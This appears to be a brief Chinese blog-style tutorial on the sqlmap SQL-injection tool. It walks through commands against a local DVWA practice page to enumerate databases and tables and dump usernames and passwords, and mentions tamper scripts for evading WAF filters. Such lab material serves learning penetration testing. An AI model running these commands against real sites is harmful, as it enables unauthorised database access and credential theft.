什么是sqlmap:
是一个开源的渗透工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限,它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
[工具使用]SqlMap_拈花倾城的博客-CSDN博客——全手册
标准格式: Python sqlmap.py -X xxx.txt --risk 3 --level 3——万能的命令
1.判断是否有SQL注入
-u 对于GET请求
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
2.跑数据库 --dbs
3.-D 数据库名--tables 跑出指定数据库的表
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa --tables
4.跑数据库列 -D 表名 -T 指定列 --columns
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users --columns
5.跑出列中内容
python sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users -C user,password --dump
常用函数:
对于POST请求,
将POST的包保存下来,将文件放到sqlmap文件里
Python Sqlmap.py -r xxx.txt
Sqlmap tamper:
使用sqlmap提供tamper脚本,在一定程度上避开过滤,绕过WAF(防火墙)规则的阻挡,进而渗透攻击。
使用tamper让自己的select变为seleselectct——自己定制规则。